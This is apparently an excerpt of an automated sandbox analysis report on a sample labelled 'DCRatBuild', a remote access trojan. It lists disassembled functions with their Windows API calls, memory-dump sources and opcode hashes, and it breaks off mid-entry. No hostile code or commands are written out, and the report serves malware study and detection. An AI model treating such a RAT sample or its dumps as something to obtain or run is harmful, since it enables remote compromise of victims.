                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 41ce38d05822977966c39c75320fd7a8d69f5120622f2c971d9a86b56469b6aa
                                      • Instruction ID: de95d7eaeb95986a72e2356423cb71124b384505d7d17039da616aed3ff3eb62
                                      • Opcode Fuzzy Hash: 41ce38d05822977966c39c75320fd7a8d69f5120622f2c971d9a86b56469b6aa
                                      • Instruction Fuzzy Hash: DC210AB2514748AFE7308F14CC85BA7BBE8EB49764F00491DF5E5821D2D3B4AC85BB61
                                      Function 00F09D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00F07547,?,?,?,?), ref: 00F09D7C
                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00F09E2C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: File$BuffersFlushTime
                                      • String ID:
                                      • API String ID: 1392018926-0
                                      • Opcode ID: c1d556c00e41425e87a724b18985867c709b5e101c30fba1945d773df9b572b8
                                      • Instruction ID: a9a634b34a15a23d2bb674b3b036f04d8782b0fc6fa60eafe2a36f14b4712543
                                      • Opcode Fuzzy Hash: c1d556c00e41425e87a724b18985867c709b5e101c30fba1945d773df9b572b8
                                      • Instruction Fuzzy Hash: DD21F63158D246ABC714DE24C851AABBBE4AF91318F04081CB8D0C3182E769DA4CFB51
                                      Function 00F2A458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,00F33958), ref: 00F2A4B8
                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F2A4C5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AddressProc__crt_fast_encode_pointer
                                      • String ID:
                                      • API String ID: 2279764990-0
                                      • Opcode ID: 40af79e0b3ba974b073a32742bf4e80210272e214e43984fae509dc1abc7450e
                                      • Instruction ID: 535f9f3402a4f3282a2c561836db4f97bb2ce1eabe26e6c5cbb896adefc7b84d
                                      • Opcode Fuzzy Hash: 40af79e0b3ba974b073a32742bf4e80210272e214e43984fae509dc1abc7450e
                                      • Instruction Fuzzy Hash: 0E110A33E116359F9B25EE28FC4599A7396AB803307164220FD15EB264EA70DC41F6D2
                                      Function 00F09B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00F09B35,?,?,00000000,?,?,00F08D9C,?), ref: 00F09BC0
                                      • GetLastError.KERNEL32 ref: 00F09BCD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: 74a49dff37d7b03a85381bb52e4780d94f296abe9f5ebca1c167e36f13690248
                                      • Instruction ID: 42f4964663f1f6734b1d393ef23addc14aa5001943b34a713e426084c7a7de57
                                      • Opcode Fuzzy Hash: 74a49dff37d7b03a85381bb52e4780d94f296abe9f5ebca1c167e36f13690248
                                      • Instruction Fuzzy Hash: D40108B230D2159BCB08CF25AC8497EB399AFC0331B10452DF812832D2FAB0DA05B620
                                      Function 00F09E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00F09E76
                                      • GetLastError.KERNEL32 ref: 00F09E82
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: c420f451e2c5a0318077d65aa4fad5fb7bb3cef81a950b6b3b5c7996776d731d
                                      • Instruction ID: e5b84066a588535c2312f9d4d8eb8bde2055786642fc578683947d8cad95a08c
                                      • Opcode Fuzzy Hash: c420f451e2c5a0318077d65aa4fad5fb7bb3cef81a950b6b3b5c7996776d731d
                                      • Instruction Fuzzy Hash: 8701F5B17082005BEB34DF29CC4476BB7D99B84325F10493DF142C36C1EAB4EC48B620
                                      Function 00F28606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00F28627
                                        • Part of subcall function 00F28518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F2C13D,00000000,?,00F267E2,?,00000008,?,00F289AD,?,?,?), ref: 00F2854A
                                      • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00F40F50,00F0CE57,?,?,?,?,?,?), ref: 00F28663
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Heap$AllocAllocate_free
                                      • String ID:
                                      • API String ID: 2447670028-0
                                      • Opcode ID: b469422082df45c253ac2f3278cd875e81d4bd437043f06802db7045a94a35a3
                                      • Instruction ID: 52e4abbf8ca3a3d53a97d1961638b2de2205bc9c876f12abb0d73f99eb43c9d3
                                      • Opcode Fuzzy Hash: b469422082df45c253ac2f3278cd875e81d4bd437043f06802db7045a94a35a3
                                      • Instruction Fuzzy Hash: 15F062325071356ADB312A65BC01B6B3F599F91BF1F288115F81497591DF28CC03B5A5
                                      Function 00F10908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?), ref: 00F10915
                                      • GetProcessAffinityMask.KERNEL32(00000000), ref: 00F1091C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Process$AffinityCurrentMask
                                      • String ID:
                                      • API String ID: 1231390398-0
                                      • Opcode ID: 1ef6bd9325316e21d16d3751d77fdb6387a6da4746a98b16541fc0739cfb73ba
                                      • Instruction ID: 742cb89cdaa47844e7a707ad1fe93d53fee6f5f008cbd3e94ae07716dc7058d7
                                      • Opcode Fuzzy Hash: 1ef6bd9325316e21d16d3751d77fdb6387a6da4746a98b16541fc0739cfb73ba
                                      • Instruction Fuzzy Hash: 64E09272E10109AB6F09CAB49C149FB739DEB142247604179A807D7301FD70DEC1A6A0
                                      Function 00F0A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00F0A27A,?,?,?,00F0A113,?,00000001,00000000,?,?), ref: 00F0A458
                                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F0A27A,?,?,?,00F0A113,?,00000001,00000000,?,?), ref: 00F0A489
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: e77a039298f933c5190b48da748c5327739dbfceafe252166aa22c48c402855c
                                      • Instruction ID: 2c0af39be6ae3663bf5b07873de6343ce687fa49345215bc228bd4852f8bedae
                                      • Opcode Fuzzy Hash: e77a039298f933c5190b48da748c5327739dbfceafe252166aa22c48c402855c
                                      • Instruction Fuzzy Hash: 5DF0A03524020D7BEF019F60DC45FD9776DBB04396F048051BC88861A1DB768AA9BA50
                                      Function 00F1D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ItemText_swprintf
                                      • String ID:
                                      • API String ID: 3011073432-0
                                      • Opcode ID: 06b9308130c9a0259f0786577cb2bfe93189596f74327d8d3c5563f37b3ecec4
                                      • Instruction ID: 5aadfc2a10dc2c71c302b48abfc108c39422ab02c06ed10be2660211daadf37e
                                      • Opcode Fuzzy Hash: 06b9308130c9a0259f0786577cb2bfe93189596f74327d8d3c5563f37b3ecec4
                                      • Instruction Fuzzy Hash: 1CF0EC7250434C7AEB11EBB19C06FDD376D9705745F040555BB00530F2D9756A907761
                                      Function 00F0A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteFileW.KERNELBASE(?,?,?,00F0984C,?,?,00F09688,?,?,?,?,00F31FA1,000000FF), ref: 00F0A13E
                                      • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00F0984C,?,?,00F09688,?,?,?,?,00F31FA1,000000FF), ref: 00F0A16C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: DeleteFile
                                      • String ID:
                                      • API String ID: 4033686569-0
                                      • Opcode ID: c9b3ef94cf45e0a86a3e81649b2f8b3c12a0313a82317ffec8eddbb7a2851426
                                      • Instruction ID: e2773c0c69ce7c0cca84b24039398b20f195cc0f8e4bdb9f936ba5fa0399954b
                                      • Opcode Fuzzy Hash: c9b3ef94cf45e0a86a3e81649b2f8b3c12a0313a82317ffec8eddbb7a2851426
                                      • Instruction Fuzzy Hash: 31E0927564020C6BEB119F60DC41FE97B6CAB08392F484065BC88C30A1DB629ED4BE90
                                      Function 00F1A39D Relevance: 3.0, APIs: 2, Instructions: 27comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GdiplusShutdown.GDIPLUS(?,?,?,?,00F31FA1,000000FF), ref: 00F1A3D1
                                      • OleUninitialize.OLE32(?,?,?,?,00F31FA1,000000FF), ref: 00F1A3D6
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: GdiplusShutdownUninitialize
                                      • String ID:
                                      • API String ID: 3856339756-0
                                      • Opcode ID: 5aaf39f241d4609767607df0325a36b4e9c6deed9b34b088d909b9b13c275c1d
                                      • Instruction ID: 70a49c6edfc03b434658d351bc498ffc910f9c44c9438dcb3f3666bcc921a8e5
                                      • Opcode Fuzzy Hash: 5aaf39f241d4609767607df0325a36b4e9c6deed9b34b088d909b9b13c275c1d
                                      • Instruction Fuzzy Hash: F4F06532618658DFC710EB5CDC05B59FBADFB49B30F04436AF41983760CB796801DA91
                                      Function 00F0A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,?,?,00F0A189,?,00F076B2,?,?,?,?), ref: 00F0A1A5
                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00F0A189,?,00F076B2,?,?,?,?), ref: 00F0A1D1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: c7b9bdbd2decee0a7197aa83437c55339c70ae7c6cd357ca25ad3efaa1b5d2d5
                                      • Instruction ID: c368f4c2a1ed3ad9fddf3725b4cf64e13ab7556ceecd9f11179e1279d2f7efae
                                      • Opcode Fuzzy Hash: c7b9bdbd2decee0a7197aa83437c55339c70ae7c6cd357ca25ad3efaa1b5d2d5
                                      • Instruction Fuzzy Hash: F0E06D759001285BDB20EA689C05BD9BB68AB083B1F0042A1BD54E3290D6719E88BAE0
                                      Function 00F10085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F100A0
                                      • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F0EB86,Crypt32.dll,00000000,00F0EC0A,?,?,00F0EBEC,?,?,?), ref: 00F100C2
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: DirectoryLibraryLoadSystem
                                      • String ID:
                                      • API String ID: 1175261203-0
                                      • Opcode ID: 13b4723575b6034a03787b1c5c53d8c5b01a43c6e09c38666cc3b5ceb4c09243
                                      • Instruction ID: a0edcbaf86102c62b8f5371929346f7ec7e909f4a8fe0a78a57790cc9f5bf51d
                                      • Opcode Fuzzy Hash: 13b4723575b6034a03787b1c5c53d8c5b01a43c6e09c38666cc3b5ceb4c09243
                                      • Instruction Fuzzy Hash: EFE0127690111C6ADB219AA49C05FD6776CEF0D392F0400A5B948D3144DA749A849BA0
                                      Function 00F19B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00F19B30
                                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00F19B37
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: BitmapCreateFromGdipStream
                                      • String ID:
                                      • API String ID: 1918208029-0
                                      • Opcode ID: 77e567f55085240cc768698246fbbb8aa0c6fc724aee2b175671bf3f9c048627
                                      • Instruction ID: e6d9ea097bfa05cddf60c08c61194998f4630a028772c0026b961bdf19a8d2f4
                                      • Opcode Fuzzy Hash: 77e567f55085240cc768698246fbbb8aa0c6fc724aee2b175671bf3f9c048627
                                      • Instruction Fuzzy Hash: C4E0ED71905218EBCB10DF99D9117D9B7E8EB09721F10805FEC9593201D6B5AF44EB91
                                      Function 00F2215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2329A: try_get_function.LIBVCRUNTIME ref: 00F232AF
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F2217A
                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00F22185
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                      • String ID:
                                      • API String ID: 806969131-0
                                      • Opcode ID: 3af80e376bce6120cdbe7b2ea1361354ff532ec5893f4efe61f6caa6b9e4e016
                                      • Instruction ID: 16af15c4329c0b3c37b541509626f72d7aac8e7eac41b5faf021cf6dd79094de
                                      • Opcode Fuzzy Hash: 3af80e376bce6120cdbe7b2ea1361354ff532ec5893f4efe61f6caa6b9e4e016
                                      • Instruction Fuzzy Hash: 8FD0A966A04336343DC866B03C43EA833446A52BB03F00A46E320CA0E2EF1881207013
                                      Function 00F1DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • DloadLock.DELAYIMP ref: 00F1DC73
                                      • DloadProtectSection.DELAYIMP ref: 00F1DC8F
                                        • Part of subcall function 00F1DE67: DloadObtainSection.DELAYIMP ref: 00F1DE77
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Dload$Section$LockObtainProtect
                                      • String ID:
                                      • API String ID: 731663317-0
                                      • Opcode ID: 8c2fb7362b5a71e56dfd03ed2fe798edd0ed70d0a9576a5417f5608235ead099
                                      • Instruction ID: 92fa8bc41c059d204f3115936b68a2e5468dc87bef440757aa491528bd67f2e5
                                      • Opcode Fuzzy Hash: 8c2fb7362b5a71e56dfd03ed2fe798edd0ed70d0a9576a5417f5608235ead099
                                      • Instruction Fuzzy Hash: C1D012715402054AC615EB149D467DD3375B70475CFB80A01F115E70A0DFF954C1F646
                                      Function 00F012E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ItemShowWindow
                                      • String ID:
                                      • API String ID: 3351165006-0
                                      • Opcode ID: 46535215b63c27601f89d6a6490468a54ddc49d18ff57bb5d0d2118997ea3d79
                                      • Instruction ID: d0a19ed9ade49c6ed209c436b3d55819914203f388593e90ef8356179be0dbdc
                                      • Opcode Fuzzy Hash: 46535215b63c27601f89d6a6490468a54ddc49d18ff57bb5d0d2118997ea3d79
